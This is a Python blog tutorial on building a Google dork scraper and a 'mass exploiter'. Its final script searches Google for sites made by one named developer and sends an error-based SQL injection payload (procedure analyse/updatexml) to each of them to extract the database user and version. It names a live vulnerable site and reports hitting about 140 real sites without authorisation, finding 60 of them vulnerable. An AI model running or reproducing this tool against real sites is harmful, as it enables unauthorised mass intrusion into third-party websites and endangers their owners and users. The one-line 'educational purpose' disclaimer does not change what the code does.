(Python) Making Your Own Google Scraper & Mass Exploiter - Mukarram Khalid
(Python) Making Your Own Google Scraper & Mass Exploiter - Mukarram Khalid
In this Step by Step Tutorial, I’ll show you how to make your own Google Scraper (Dork Scanner) and Mass Vulnerability Scanner / Exploiter in Python.
Simplicity
Efficiency
Extensibility
Cross-Platform Runability
Best Community
Requirements
For this tutorial, I’ll be using Python 3.4.3, some built in libraries (sys (https://docs.python.org/3.4/library/sys.html), multiprocessing
(https://docs.python.org/3.4/library/multiprocessing.html), functools (https://docs.python.org/3/library/functools.html), re
(https://docs.python.org/3/library/re.html)) and following modules.
Requests (https://pypi.python.org/pypi/requests)
Requests is an Apache2 Licensed HTTP library, written in Python, for human beings.
Beautifulsoup4 (https://pypi.python.org/pypi/beautifulsoup4)
Beautiful Soup sits atop an HTML or XML parser, providing Pythonic idioms for iterating, searching, and modifying the
parse tree.
To install these modules, I’ll use pip (https://docs.python.org/3/installing/). As per the documentation, pip is the preferred installer program and starting
with Python 3.4, it is included by default with the Python binary installers. To use pip, open you terminal and simply type :
Python
1 python -m pip install requests beautifulsoup4
(//mukarramkhalid.com/wp-content/uploads/2015/08/pip.png)
Note:
I’ll try to make this as simple (readable) as possible. Read the comments given in the codes. With each new code, I’ll
remove previous comments to make space for the new ones. So make sure you don’t miss any.
Python
1 http://www.google.com/search
So, if I want to do a search for a string makman. The URLs would be:
Python
https://mukarramkhalid.com/python-making-your-own-google-scraper-mass-exploiter/ 1/8
3/9/2019 [Python] Making Your Own Google Scraper & Mass Exploiter - Mukarram Khalid
1 Page 0 : http://www.google.com/search?q=makman&start=0
2 Page 1 : http://www.google.com/search?q=makman&start=10
3 Page 2 : http://www.google.com/search?q=makman&start=20
4 Page 3 : http://www.google.com/search?q=makman&start=30
5 ...
6 ...
Let’s do a quick test and see if we can grab the first page.
Python
1 import requests
2
3 #url
4 url = 'http://www.google.com/search'
5
6 #Parameters in payload
7 payload = { 'q' : 'makman', 'start' : '0' }
8
9 #Setting User-Agent
10 my_headers = { 'User-agent' : 'Mozilla/11.0' }
11
12 #Getting the response in an Object r
13 r = requests.get( url, params = payload, headers = my_headers )
14
15 #Read the reponse with utf-8 encoding
16 print( r.text.encode('utf-8') )
17
18 #End
(//mukarramkhalid.com/wp-content/uploads/2015/08/requests_check.png)
Now, we’ll use beautifulsoup4 to pull the required data from the source. Our required URLs are inside <h3 class=”r”> tags with class ‘r’.
(//mukarramkhalid.com/wp-content/uploads/2015/08/google_h3.png)
There’ll be 10 <h3 class=”r”> on each page and our required URL will be inside these h3 tags as <a href=”here”>. So, we’ll use beautifulsoup4 to grab the
contents of all these h3 tags and then some regex matching to get our final URLs.
Python
1 import requests, re
2 from bs4 import BeautifulSoup
3
4
5 #url
6 url = 'http://www.google.com/search'
7
8 #Parameters in payload
9 payload = { 'q' : 'makman', 'start' : '0' }
10
11 #Setting User-Agent
12 my_headers = { 'User-agent' : 'Mozilla/11.0' }
13
14 #Getting the response in an Object r
15 r = requests.get( url, params = payload, headers = my_headers )
16
17 #Create a Beautiful soup Object of the response r parsed as html
18 soup = BeautifulSoup( r.text, 'html.parser' )
19
20 #Getting all h3 tags with class 'r'
21 h3tags = soup.find_all( 'h3', class_='r' )
22
23 #Finding URL inside each h3 tag using regex.
24 #If found : Print, else : Ignore the exception
25 for h3 in h3tags:
26 try:
27 print( re.search('url\?q=(.+?)\&sa', h3.a['href']).group(1) )
28 except:
29 continue
30
31
32 #End
(//mukarramkhalid.com/wp-content/uploads/2015/08/first_page.png)
https://mukarramkhalid.com/python-making-your-own-google-scraper-mass-exploiter/ 2/8
3/9/2019 [Python] Making Your Own Google Scraper & Mass Exploiter - Mukarram Khalid
Now we just have to do this whole procedure generically. User will provide the search string and number of pages to scan. I’ll make a function of this
whole process and call it dynamically when required. To create the command line interface, I’ll use an awesome module called docopt
(https://pypi.python.org/pypi/docopt) which is not included in Pythons core but you’ll love it. I’ll use pip (again) to install docopt.
(//mukarramkhalid.com/wp-content/uploads/2015/08/docopt.png)
After adding command line interface, user interaction, little dynamic functionality and some time logging functions to check the execution time of the
script, this is what it looks like.
Python
1 """MakMan Google Scrapper & Mass Exploiter
2
3 Usage:
4 scrap.py <search> <pages>
5 scrap.py (-h | --help)
6
7 Arguments:
8 <search> String to be Searched
9 <pages> Number of pages
10
11 Options:
12 -h, --help Show this screen.
13
14 """
15
16 import requests, re
17 from docopt import docopt
18 from bs4 import BeautifulSoup
19 from time import time as timer
20
21
22 def get_urls(search_string, start):
23 #Empty temp List to store the Urls
24 temp = []
25 url = 'http://www.google.com/search'
26 payload = { 'q' : search_string, 'start' : start }
27 my_headers = { 'User-agent' : 'Mozilla/11.0' }
28 r = requests.get( url, params = payload, headers = my_headers )
29 soup = BeautifulSoup( r.text, 'html.parser' )
30 h3tags = soup.find_all( 'h3', class_='r' )
31 for h3 in h3tags:
32 try:
33 temp.append( re.search('url\?q=(.+?)\&sa', h3.a['href']).group(1) )
34 except:
35 continue
36 return temp
37
38 def main():
39 start = timer()
40 #Empty List to store the Urls
41 result = []
42 arguments = docopt( __doc__, version='MakMan Google Scrapper & Mass Exploiter' )
43 search = arguments['<search>']
44 pages = arguments['<pages>']
45 #Calling the function [pages] times.
46 for page in range( 0, int(pages) ):
47 #Getting the URLs in the list
48 result.extend( get_urls( search, str(page*10) ) )
49 #Removing Duplicate URLs
50 result = list( set( result ) )
51 print( *result, sep = '\n' )
52 print( '\nTotal URLs Scraped : %s ' % str( len( result ) ) )
53 print( 'Script Execution Time : %s ' % ( timer() - start, ) )
54
55 if __name__ == '__main__':
56 main()
57
58 #End
(//mukarramkhalid.com/wp-content/uploads/2015/08/testrun1.png)
Sweet. Let’s run it for the string ‘microsoft’, scan first 20 pages and check the execution time.
https://mukarramkhalid.com/python-making-your-own-google-scraper-mass-exploiter/ 3/8
3/9/2019 [Python] Making Your Own Google Scraper & Mass Exploiter - Mukarram Khalid
(//mukarramkhalid.com/wp-content/uploads/2015/08/testrun2.png)
So, It scraped 200 URLs in about 32 Seconds. Currently, It’s running as a single process. Let’s add some multi-processing and see if we can reduce the
execution time. After adding multi-processing features, this is what my script looks like.
Python
1 """MakMan Google Scrapper & Mass Exploiter
2
3 Usage:
4 makman_scrapy.py <search> <pages> <processes>
5 makman_scrapy.py (-h | --help)
6
7 Arguments:
8 <search> String to be Searched
9 <pages> Number of pages
10 <processes> Number of parallel processes
11
12 Options:
13 -h, --help Show this screen.
14
15 """
16
17 import requests, re, sys
18 from docopt import docopt
19 from bs4 import BeautifulSoup
20 from time import time as timer
21 from functools import partial
22 from multiprocessing import Pool
23
24
25 def get_urls(search_string, start):
26 temp = []
27 url = 'http://www.google.com/search'
28 payload = { 'q' : search_string, 'start' : start }
29 my_headers = { 'User-agent' : 'Mozilla/11.0' }
30 r = requests.get( url, params = payload, headers = my_headers )
31 soup = BeautifulSoup( r.text, 'html.parser' )
32 h3tags = soup.find_all( 'h3', class_='r' )
33 for h3 in h3tags:
34 try:
35 temp.append( re.search('url\?q=(.+?)\&sa', h3.a['href']).group(1) )
36 except:
37 continue
38 return temp
39
40 def main():
41 start = timer()
42 result = []
43 arguments = docopt( __doc__, version='MakMan Google Scrapper & Mass Exploiter' )
44 search = arguments['<search>']
45 pages = arguments['<pages>']
46 processes = int( arguments['<processes>'] )
47 ####Changes for Multi-Processing####
48 make_request = partial( get_urls, search )
49 pagelist = [ str(x*10) for x in range( 0, int(pages) ) ]
50 with Pool(processes) as p:
51 tmp = p.map(make_request, pagelist)
52 for x in tmp:
53 result.extend(x)
54 ####Changes for Multi-Processing####
55 result = list( set( result ) )
56 print( *result, sep = '\n' )
57 print( '\nTotal URLs Scraped : %s ' % str( len( result ) ) )
58 print( 'Script Execution Time : %s ' % ( timer() - start, ) )
59
60 if __name__ == '__main__':
61 main()
62
63 #End
Now let’s run the same string ‘microsoft’ for 20 pages but this time with 8 parallel processes.
(//mukarramkhalid.com/wp-content/uploads/2015/08/testrun3.png)
(//mukarramkhalid.com/wp-content/uploads/2015/08/testrun4.png)
Perfect. The execution time went down to 6 seconds, almost 5 times lesser than the previous attempt.
https://mukarramkhalid.com/python-making-your-own-google-scraper-mass-exploiter/ 4/8
3/9/2019 [Python] Making Your Own Google Scraper & Mass Exploiter - Mukarram Khalid
Warning:
It won’t be a good idea to use more than 8 parallel processes. Google may block your IP or display the captcha
verification page instead of the search results. I would recommend to keep it under 8.
So, Our Google URL Scraper is up and running . Now I’ll show you how to make a mass vulnerability scanner & exploitation tool using this Google
Scraper. We can save this file and use it as a separate module in other projects. I’ll save the following code as makman.py .
makman.py Python
1 #By MakMan - 26-08-2015
2
3 import requests, re, sys
4 from bs4 import BeautifulSoup
5 from functools import partial
6 from multiprocessing import Pool
7
8
9 def get_urls(search_string, start):
10 temp = []
11 url = 'http://www.google.com/search'
12 payload = { 'q' : search_string, 'start' : start }
13 my_headers = { 'User-agent' : 'Mozilla/11.0' }
14 r = requests.get( url, params = payload, headers = my_headers )
15 soup = BeautifulSoup( r.text, 'html.parser' )
16 h3tags = soup.find_all( 'h3', class_='r' )
17 for h3 in h3tags:
18 try:
19 temp.append( re.search('url\?q=(.+?)\&sa', h3.a['href']).group(1) )
20 except:
21 continue
22 return temp
23
24 def dork_scanner(search, pages, processes):
25 result = []
26 search = search
27 pages = pages
28 processes = int( processes )
29 make_request = partial( get_urls, search )
30 pagelist = [ str(x*10) for x in range( 0, int(pages) ) ]
31 with Pool(processes) as p:
32 tmp = p.map(make_request, pagelist)
33 for x in tmp:
34 result.extend(x)
35 result = list( set( result ) )
36 return result
37
38 #End
I have renamed the main function to dork_scanner. Now, I can import this file in any other python code and call dork_scanner to get URLs. This
dork_scanner takes 3 parameters : search string, pages to scan and number of parallel processes. At the end, It will return a list of URLs. Just make sure
makman.py is in the same directory as the other file. Let’s try it out.
main.py Python
1 from makman import *
2
3
4 if __name__ == '__main__':
5 #Calling dork_scanner from makman.py
6 #String : hello, pages : 2, processes : 2
7 result = dork_scanner( 'hello', '2', '2' )
8 print ( *result, sep = '\n' )
9
10
11 #End
(//mukarramkhalid.com/wp-content/uploads/2015/08/main_test.png)
I’ll demonstrate mass scanning / exploitation using an SQL Injection vulnerability which is affecting some websites developed by iNET Business Hub (Web
Application Developers). Here’s a demo of an SQLi vulnerability in their photogallery module.
MySQL
1 http://mkmschool.edu.in/photogallery.php?extentions=1&rpp=1 procedure analyse( updatexml(null,concat+(0x3a,version()),null),1)
https://mukarramkhalid.com/python-making-your-own-google-scraper-mass-exploiter/ 5/8
3/9/2019 [Python] Making Your Own Google Scraper & Mass Exploiter - Mukarram Khalid
(//mukarramkhalid.com/wp-content/uploads/2015/08/xpath1.png)
Even though this vulnerability is very old, there are still hundreds of websites vulnerable to this bug. We can use the following Google dork to find the
vulnerable websites.
I’ve made a separate function to perform the injection. Make sure makman.py is in the same directory.
I’ll call my dork_scanner function in the main function and scan first 15 pages with 4 parallel processes. And for the exploitation part, I’ll use 8 parallel
processes because we have to inject around 150 URLs and it’ll take hell lot of time with a single process. So, after adding the main function,
Multiprocessing to the exploitation part and some file logging to save the results, this is what my script looks like.
main.py Python
https://mukarramkhalid.com/python-making-your-own-google-scraper-mass-exploiter/ 6/8
3/9/2019 [Python] Making Your Own Google Scraper & Mass Exploiter - Mukarram Khalid
1 #Make sure makman.py is in the same directory
2 from makman import *
3 from urllib.parse import urlparse
4 from time import time as timer
5
6
7 def inject( u ):
8 #Payload with Injection Query
9 payload = { 'extentions' : '1', 'rpp' : '1 /*!00000procedure analyse( updatexml(null,concat (0x3a,user(),0x3a,version()),null
10 #Formating our URL properly
11 o = urlparse(u)
12 url = o.scheme + '://' + o.netloc + o.path
13 try:
14 r = requests.get( url, params = payload )
15 if 'XPATH syntax error' in r.text:
16 return url + ':' + re.search( "XPATH syntax error: ':(.+?)'", r.text ).group(1)
17 else:
18 return url + ':' + 'Not Vulnerable'
19 except:
20 return url + ':' + 'Bad Response'
21
22
23 def main():
24 start = timer()
25 #Calling dork_scanner from makman.py for 15 pages and 4 parallel processes
26 search_result = dork_scanner( 'intext:Developed by : iNET inurl:photogallery.php', '15', '4' )
27 file_string = '######## By MakMan ########\n'
28 final_result = []
29 count = 0
30 #Running 8 parallel processes for the exploitation
31 with Pool(8) as p:
32 final_result.extend( p.map( inject, search_result ) )
33 for i in final_result:
34 if not 'Not Vulnerable' in i and not 'Bad Response' in i:
35 count += 1
36 print ( '------------------------------------------------\n')
37 print ( 'Url : http:' + i.split(':')[1] )
38 print ( 'User : ' + i.split(':')[2] )
39 print ( 'Version : ' + i.split(':')[3] )
40 print ( '------------------------------------------------\n')
41 file_string = file_string + 'http:' + i.split(':')[1] + '\n' + i.split(':')[2] + '\n' + i.split(':')[3] + '\n\n\n'
42 #Writing vulnerable URLs in a file makman.txt
43 with open( 'makman.txt', 'a', encoding = 'utf-8' ) as file:
44 file.write( file_string )
45 print( 'Total URLs Scanned : %s' % len( search_result ) )
46 print( 'Vulnerable URLs Found : %s' % count )
47 print( 'Script Execution Time : %s' % ( timer() - start, ) )
48
49
50 if __name__ == '__main__':
51 main()
52
53
54 #End
(//mukarramkhalid.com/wp-content/uploads/2015/08/final3.png)
Scan Result:
So technically speaking, in 64 seconds, we scanned 15 pages of Google, grabbed 140 URLs, went to 140 URLs individually & performed SQL Injection
and finally saved the results of 60 vulnerable URLs. So F***in Cool !!
You can see the result file generated at the end of the script here (http://makman.tk/makman.txt).
GitHub Repository:
Google-Scraper (https://github.com/mukarramkhalid/google-scraper)
Final Notes:
This script is not perfect. We can still add so many features to it. If you have any suggestions, feel free to contact me. Details are in the footer. And thanks
for reading.
Disclaimer:
https://mukarramkhalid.com/python-making-your-own-google-scraper-mass-exploiter/ 7/8
3/9/2019 [Python] Making Your Own Google Scraper & Mass Exploiter - Mukarram Khalid
I hereby take no responsibility for the loss/damage caused by this tutorial. This article has been shared for educational purpose only and Automatic
crawling is against Google’s terms of service.
(https://mukarramkhalid.com/python-making-your-own-google-scraper-mass-exploiter/?share=facebook&nb=1)
3
(https://mukarramkhalid.com/python-making-your-own-google-scraper-mass-exploiter/?share=twitter&nb=1)
(https://mukarramkhalid.com/python-making-your-own-google-scraper-mass-exploiter/?share=linkedin&nb=1)
(https://mukarramkhalid.com/python-making-your-own-google-scraper-mass-exploiter/?share=tumblr&nb=1)
(https://mukarramkhalid.com/python-making-your-own-google-scraper-mass-exploiter/?share=reddit&nb=1)
(https://www.facebook.com/makmaniac)
(https://twitter.com/themakmaniac)
(https://github.com/mukarramkhalid)
(https://vimeo.com/user25006342)
(https://www.youtube.com/channel/UCLuXQDIMY0lEIbsMhU97wFw)
Mukarram Khalid
https://mukarramkhalid.com/python-making-your-own-google-scraper-mass-exploiter/ 8/8